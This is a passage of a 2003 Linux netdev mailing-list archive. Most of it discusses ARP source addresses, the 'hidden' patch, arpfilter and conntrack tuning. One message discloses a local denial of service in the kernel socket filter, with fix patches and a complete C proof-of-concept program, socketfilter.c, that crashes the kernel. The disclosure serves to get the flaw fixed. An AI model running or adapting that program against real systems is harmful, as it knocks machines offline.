reply if the src IP in incoming probe matches local IP. But may be only Linux preserves the src IP in outgoing probes. Regards -- Julian Anastasov From carlosev@newipnet.com Thu Jul 24 09:48:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:48:11 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGm5Fl025240 for ; Thu, 24 Jul 2003 09:48:06 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 1CA6420775; Thu, 24 Jul 2003 18:48:03 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 44FBE207B3; Thu, 24 Jul 2003 18:47:54 +0200 (CEST) Message-ID: <200307241836060226.006FACEB@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 18:36:06 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OGm5Fl025240 X-archive-position: 4293 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 19:32 Julian Anastasov wrote: > There are some exceptions for the src IP. Even Linux will >not reply if the src IP in incoming probe matches local IP. But >may be only Linux preserves the src IP in outgoing probes. I think so, I don't like that src IP in outgoing probes... but as Windows OS replies to this ARP can't see why Cisco IOS is not replying. Will open a TAC case tomorrow. I'm interested on testing this in Solaris. Regards, Carlos Velasco From carlosev@newipnet.com Thu Jul 24 11:22:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 11:22:13 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OIM2Fl012012 for ; Thu, 24 Jul 2003 11:22:03 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 6011920775; Thu, 24 Jul 2003 20:22:00 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 9776D207B4; Thu, 24 Jul 2003 20:21:48 +0200 (CEST) Message-ID: <200307242011420101.00BC642D@192.168.128.16> In-Reply-To: <200307241836060226.006FACEB@192.168.128.16> References: <200307241836060226.006FACEB@192.168.128.16> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 20:11:42 +0200 From: "Carlos Velasco" To: "Carlos Velasco" , "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OIM2Fl012012 X-archive-position: 4294 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 18:36 Carlos Velasco wrote: >> There are some exceptions for the src IP. Even Linux will >>not reply if the src IP in incoming probe matches local IP. But >>may be only Linux preserves the src IP in outgoing probes. Tested these platforms: Solaris 8 -> sends src IP address of INTERFACE Cisco -> sends src IP address of INTERFACE Windows 2000, XP -> sends src IP address of INTERFACE Linux 2.6.0-pre1, 2.4.20, 2.4.21 -> sends src IP address of LOOPBACK Question: ¿What would be the implications of applying my patch or similar to do linux behave like other OS? >Will open a TAC case tomorrow. I'm interested on testing this in Solaris. Same tests: Solaris 8 -> replies the ARP request Windows 2000, XP -> replies the ARP request Linux 2.4.21 -> replies the ARP request Cisco -> NOT replies the ARP request I will contact Cisco to see why they don't do and if it can be fixed in future releases. Regards, Carlos Velasco From davem@redhat.com Thu Jul 24 11:40:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 11:40:19 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OIeEFl016803 for ; Thu, 24 Jul 2003 11:40:15 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA13648; Thu, 24 Jul 2003 11:37:31 -0700 Date: Thu, 24 Jul 2003 11:37:31 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: carlosev@newipnet.com, ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Message-Id: <20030724113731.73e9bbf6.davem@redhat.com> In-Reply-To: <200307242011420101.00BC642D@192.168.128.16> References: <200307241836060226.006FACEB@192.168.128.16> <200307242011420101.00BC642D@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4295 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 20:11:42 +0200 "Carlos Velasco" wrote: > Tested these platforms: > > Solaris 8 -> sends src IP address of INTERFACE > Cisco -> sends src IP address of INTERFACE > Windows 2000, XP -> sends src IP address of INTERFACE > Linux 2.6.0-pre1, 2.4.20, 2.4.21 -> sends src IP address of LOOPBACK > > Question: _What would be the implications of applying my patch or similar to do linux behave like other OS? You'll break things for people who depend upon the way Linux currently behaves. From carlosev@newipnet.com Thu Jul 24 12:11:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 12:11:07 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OJAwFl026028 for ; Thu, 24 Jul 2003 12:10:59 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 9916320775; Thu, 24 Jul 2003 21:10:57 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 57C64207B3; Thu, 24 Jul 2003 21:10:47 +0200 (CEST) Message-ID: <200307242054550080.00E3F4FF@192.168.128.16> In-Reply-To: <20030724113731.73e9bbf6.davem@redhat.com> References: <200307241836060226.006FACEB@192.168.128.16> <200307242011420101.00BC642D@192.168.128.16> <20030724113731.73e9bbf6.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 20:54:55 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OJAwFl026028 X-archive-position: 4296 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 11:37 David S. Miller wrote: >> Question: _What would be the implications of applying my patch or >similar to do linux behave like other OS? > >You'll break things for people who depend upon the >way Linux currently behaves. Well, really the question is: What are these situations exactly? IMHO... the patch is only changing the src ip address for arp requests on a few situations. Regards, Carlos Velasco From laforge@netfilter.org Thu Jul 24 13:13:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 13:13:30 -0700 (PDT) Received: from coruscant.gnumonks.org (mail@coruscant.franken.de [193.174.159.226]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OKDJFl002725 for ; Thu, 24 Jul 2003 13:13:21 -0700 Received: from uucp by coruscant.gnumonks.org with local-bsmtp (Exim 4.20) id 19fmSj-0001pD-Ti for netdev@oss.sgi.com; Thu, 24 Jul 2003 22:13:17 +0200 Received: from laforge by naboo.gnumonks.org with local (Exim 3.36 #1) id 19fiWq-0002w6-00; Thu, 24 Jul 2003 18:01:16 +0200 Date: Thu, 24 Jul 2003 18:01:16 +0200 From: Harald Welte To: Carlos Carvalho Cc: netdev@oss.sgi.com Subject: Re: Memory usage for ip_conntrack Message-ID: <20030724160107.GC10897@naboo> References: <1058563690.26030.23.camel@tux.rsn.bth.se> <16153.56832.379224.202834@fisica.ufpr.br> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="IpbVkmxF4tDyP/Kb" Content-Disposition: inline In-Reply-To: <16153.56832.379224.202834@fisica.ufpr.br> X-Operating-System: Linux naboo 2.4.20-nfpom1101 X-Date: Today is Prickle-Prickle, the 58th day of Confusion in the YOLD 3169 User-Agent: Mutt/1.5.4i X-archive-position: 4297 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: laforge@netfilter.org Precedence: bulk X-list: netdev --IpbVkmxF4tDyP/Kb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Jul 19, 2003 at 09:10:40PM -0300, Carlos Carvalho wrote: > Martin Josefsson (gandalf@wlug.westbo.se) wrote on 18 July 2003 23:28: > >> If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my wo= rst > >> case memory usage? > > > >Don't do this. This will increase the maximum number of connections it > >will track, but not the number of buckets. Which means that it will be > >slower due to longer collision-chains. Instead increase the number of > >buckets. modprobe ip_conntrack hashsize=3D131072 (or any number here. >=20 > How can we increase the number of buckets with a monolithic kernel? For 2.4: by altering the default in the kernel source, sorry. For 2.5/2.6: there is now a generic way of specifying module parameters =66rom the boot command line. --=20 - Harald Welte http://www.netfilter.org/ =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D "Fragmentation is like classful addressing -- an interesting early architectural error that shows how much experimentation was going on while IP was being designed." -- Paul Vixie --IpbVkmxF4tDyP/Kb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE/IALBXaXGVTD0i/8RAh2DAJ9qobKhgY2vjygWm/0rcGyOkFFkHACgl//g AL7lgAvRyJXOnotlqbED8Qw= =cw1n -----END PGP SIGNATURE----- --IpbVkmxF4tDyP/Kb-- From krkumar@us.ibm.com Thu Jul 24 17:15:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 17:15:37 -0700 (PDT) Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6P0FGFl023041 for ; Thu, 24 Jul 2003 17:15:28 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6P0EF4X220950; Thu, 24 Jul 2003 20:14:15 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6P0ECPT222384; Thu, 24 Jul 2003 20:14:13 -0400 Message-ID: <3F20766C.3060400@us.ibm.com> Date: Thu, 24 Jul 2003 17:14:36 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kuznet@ms2.inr.ac.ru CC: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 References: <200307241443.SAA09525@dub.inr.ac.ru> In-Reply-To: <200307241443.SAA09525@dub.inr.ac.ru> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4298 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev So people are ok with using struct ? Since it can be typecast as an array :-) thanks, - KK kuznet@ms2.inr.ac.ru wrote: > Hello! > > >>I'm not so sure about the "array," but anyway, >>I don't think it is so ugly to use struct / offsetof. > > > Just write a sample of code, printing all fields of struct > and equivalent array, and you will see. > > Well, I just know, that when iproute will do this, it will > cast the struct to array in any case. It is dirty, but sane at least. :-) > > Alexey > From davem@redhat.com Fri Jul 25 06:26:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 06:26:14 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PDQ0Fl023242 for ; Fri, 25 Jul 2003 06:26:03 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id GAA15064; Fri, 25 Jul 2003 06:22:41 -0700 Date: Fri, 25 Jul 2003 06:22:41 -0700 From: "David S. Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: O/M flags against 2.6.0-test1 Message-Id: <20030725062241.2df3e700.davem@redhat.com> In-Reply-To: <3F20766C.3060400@us.ibm.com> References: <200307241443.SAA09525@dub.inr.ac.ru> <3F20766C.3060400@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4299 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 17:14:36 -0700 Krishna Kumar wrote: > So people are ok with using struct ? Since it can be typecast as an array :-) I think something more like route metrics, ie. an array, is more appropriate and that Alexey is right about this. From kaber@trash.net Fri Jul 25 11:19:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:19:45 -0700 (PDT) Received: from gw.localnet (port-212-202-53-133.reverse.qsc.de [212.202.53.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PIJZFl007685 for ; Fri, 25 Jul 2003 11:19:38 -0700 Received: from ws.localnet ([192.168.0.23] helo=trash.net) by gw.localnet with esmtp (Exim 3.36 #1 (Debian)) id 19g791-0005Cn-00; Fri, 25 Jul 2003 20:18:19 +0200 Message-ID: <3F2174E6.7060700@trash.net> Date: Fri, 25 Jul 2003 20:20:22 +0200 From: Patrick McHardy User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.4-2 X-Accept-Language: en MIME-Version: 1.0 To: netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Local dos in linux socket filters Content-Type: multipart/mixed; boundary="------------030305030001080202030804" X-archive-position: 4300 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kaber@trash.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------030305030001080202030804 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Dave Miller asked me to post this so it is public: The Linux Socket Filter implementation contains a bug which can lead to a local dos. Due to a unsigned->signed conversion and insufficient bounds checking it is possible to crash the kernel by accessing unmapped memory. The bug was introduced during the attempt to fix other signedness issues in 2.4.3-pre3. The attached two patches for 2.4 and 2.6 fix the problem (already in davem's tree). Also attached is a program to crash your kernel. Bye, Patrick --------------030305030001080202030804 Content-Type: text/plain; name="linux-2.4-sock_filter-dos.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="linux-2.4-sock_filter-dos.diff" ===== filter.c 1.3 vs edited ===== --- 1.3/net/core/filter.c Tue Feb 5 08:40:16 2002 +++ edited/filter.c Fri Jul 25 02:16:30 2003 @@ -294,10 +294,9 @@ goto load_b; case BPF_LDX|BPF_B|BPF_MSH: - k = fentry->k; - if(k >= 0 && (unsigned int)k >= len) + if(fentry->k >= len) return (0); - X = (data[k] & 0xf) << 2; + X = (data[fentry->k] & 0xf) << 2; continue; case BPF_LD|BPF_IMM: --------------030305030001080202030804 Content-Type: text/plain; name="linux-2.6-sock_filter-dos.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="linux-2.6-sock_filter-dos.diff" ===== net/core/filter.c 1.6 vs edited ===== --- 1.6/net/core/filter.c Thu Jun 5 02:57:08 2003 +++ edited/net/core/filter.c Fri Jul 25 02:35:07 2003 @@ -256,10 +256,9 @@ k = X + fentry->k; goto load_b; case BPF_LDX|BPF_B|BPF_MSH: - k = fentry->k; - if (k >= 0 && (unsigned int)k >= len) + if (fentry->k >= len) return 0; - X = (data[k] & 0xf) << 2; + X = (data[fentry->k] & 0xf) << 2; continue; case BPF_LD|BPF_IMM: A = fentry->k; --------------030305030001080202030804 Content-Type: text/x-csrc; name="socketfilter.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="socketfilter.c" #include #include #include #include #include int main(int argc, char **argv) { struct sockaddr_in sin; struct bpf_program bp; struct bpf_insn buf[10]; char rcvbuf[2000]; int i = 0; int fd; fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (fd < 0) { perror("socket"); exit(1); } memset(buf, 0, sizeof(buf)); buf[i].code = BPF_LDX|BPF_B|BPF_MSH; buf[i].k = (1<<31) + (1<<29); i++; buf[i].code = BPF_RET; i++; bp.bf_len = i; bp.bf_insns = buf; if (setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &bp, sizeof(bp)) < 0) { perror("setsockopt"); exit(1); } sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; sin.sin_port = htons(10000); if (bind(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("bind"); exit(1); } if (recvfrom(fd, rcvbuf, sizeof(rcvbuf), 0, NULL, 0) < 0) { perror("recvfrom"); exit(1); } } --------------030305030001080202030804-- From carlosev@newipnet.com Fri Jul 25 11:47:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:47:42 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PIlZFl009561 for ; Fri, 25 Jul 2003 11:47:37 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id DE4F3207A0; Fri, 25 Jul 2003 20:47:33 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id E3E1E20775; Fri, 25 Jul 2003 20:47:18 +0200 (CEST) Message-ID: <200307252024190066.051F80CE@192.168.128.16> In-Reply-To: <20030724091007.68923845.davem@redhat.com> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Fri, 25 Jul 2003 20:24:19 +0200 From: "Carlos Velasco" To: "David S. Miller" , "Julian Anastasov" Cc: bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6PIlZFl009561 X-archive-position: 4301 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 9:10 David S. Miller wrote: >The hidden patch is not necessary with current kernels and arpfilter. arp_filter doesn't work. If I'm not wrong it's applied when you have two or more interfaces in the same subnet. This is not the case. I have applied hidden patch and it works. If I'm not wrong, the hidden patch makes linux behave like other OS, separating selected interfaces of another interfaces. It does not break anything because it's all configurable in /proc. Maybe it would be good including it in the kernel package? Regards, Carlos Velasco From davem@redhat.com Fri Jul 25 11:49:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:49:27 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PInMFl009951 for ; Fri, 25 Jul 2003 11:49:23 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA15961; Fri, 25 Jul 2003 11:46:35 -0700 Date: Fri, 25 Jul 2003 11:46:34 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Message-Id: <20030725114634.73dc9e8d.davem@redhat.com> In-Reply-To: <200307252024190066.051F80CE@192.168.128.16> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4302 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 25 Jul 2003 20:24:19 +0200 "Carlos Velasco" wrote: > On 24/07/2003 at 9:10 David S. Miller wrote: > > >The hidden patch is not necessary with current kernels and arpfilter. > > arp_filter doesn't work. This is impossible, hidden is a subset of what arpfilter can do. arpfilter is a netfilter module that can block ARP packets at any point in the networking stack, at your choosing. From carlosev@newipnet.com Fri Jul 25 11:59:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 11:59:23 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PIxHFl010777 for ; Fri, 25 Jul 2003 11:59:18 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 9BB3220775; Fri, 25 Jul 2003 20:59:15 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 0F6E6207A0; Fri, 25 Jul 2003 20:59:05 +0200 (CEST) Message-ID: <200307252036050292.052A4780@192.168.128.16> In-Reply-To: <20030725114634.73dc9e8d.davem@redhat.com> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> <20030725114634.73dc9e8d.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Fri, 25 Jul 2003 20:36:05 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Content-Type: text/plain; charset="us-ascii" X-archive-position: 4303 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 25/07/2003 at 11:46 David S. Miller wrote: >This is impossible, hidden is a subset of what arpfilter can do. > >arpfilter is a netfilter module that can block ARP packets >at any point in the networking stack, at your choosing. Maybe I'm looking in the wrong place. I have tried with this setting in /proc: === arp_filter - BOOLEAN 1 - Allows you to have multiple network interfaces on the same subnet, and have the ARPs for each interface be answered based on whether or not the kernel would route a packet from the ARP'd IP out that interface (therefore you must use source based routing for this to work). In other words it allows control of which cards (usually 1) will respond to an arp request. === Should I need any user space program to configure it or so? Regards, Carlos Velasco From davem@redhat.com Fri Jul 25 12:01:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 12:01:53 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PJ1nFl011252 for ; Fri, 25 Jul 2003 12:01:49 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA16008; Fri, 25 Jul 2003 11:59:02 -0700 Date: Fri, 25 Jul 2003 11:59:02 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Message-Id: <20030725115902.1d2f61b2.davem@redhat.com> In-Reply-To: <200307252036050292.052A4780@192.168.128.16> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> <20030725114634.73dc9e8d.davem@redhat.com> <200307252036050292.052A4780@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4304 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 25 Jul 2003 20:36:05 +0200 "Carlos Velasco" wrote: > On 25/07/2003 at 11:46 David S. Miller wrote: > > >This is impossible, hidden is a subset of what arpfilter can do. > > > >arpfilter is a netfilter module that can block ARP packets > >at any point in the networking stack, at your choosing. > > Maybe I'm looking in the wrong place. You are, I'm not talking about the sysconfig setting. I'm talking about a netfilter module, and yes it does require a tool for configuration which Bart DeSchuym has written, he posted a link to his work earlier in these threads. From carlosev@newipnet.com Fri Jul 25 12:47:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 12:47:14 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PJl5Fl018839 for ; Fri, 25 Jul 2003 12:47:07 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 60659207B5; Fri, 25 Jul 2003 21:46:57 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 4E43E20775; Fri, 25 Jul 2003 21:46:46 +0200 (CEST) Message-ID: <200307252123460606.0555F082@192.168.128.16> In-Reply-To: <20030725115902.1d2f61b2.davem@redhat.com> References: <200307241728270476.0031BAB0@192.168.128.16> <20030724091007.68923845.davem@redhat.com> <200307252024190066.051F80CE@192.168.128.16> <20030725114634.73dc9e8d.davem@redhat.com> <200307252036050292.052A4780@192.168.128.16> <20030725115902.1d2f61b2.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Fri, 25 Jul 2003 21:23:46 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6PJl5Fl018839 X-archive-position: 4305 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 25/07/2003 at 11:59 David S. Miller wrote: >I'm talking about a netfilter module, and yes it does require >a tool for configuration which Bart DeSchuym has written, he >posted a link to his work earlier in these threads. Well, I consider the hiding patch to be a simplier and better approach to this strange behaviour in Linux (compared to other OS and systems) than needing to include and compile netfilter in the kernel. However I will take a look at it. I have searched and found that this is not the first time that this discussion has raised: http://www.ussg.iu.edu/hypermail/linux/kernel/0212.0/1128.html Really I am 100% in accordance with this: === I still don't see why an address that is -=ASSIGNED TO AN INTERFACE=- should be responded to on a completely different interface... if we wanted the ip address to be assigned to the system, there should be a pseudo interface that will work on any of the interfaces attached. Why assign an address to an interface if it would work just the same if you assigned it to the loopback adapter? Why would you assign an address to the loopback adapter if you wanted it to be accessed from the world? === Is "hiding" incompatible with any other feature? Regards, Carlos Velasco From shemminger@osdl.org Fri Jul 25 13:36:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 13:37:00 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PKasFl022470 for ; Fri, 25 Jul 2003 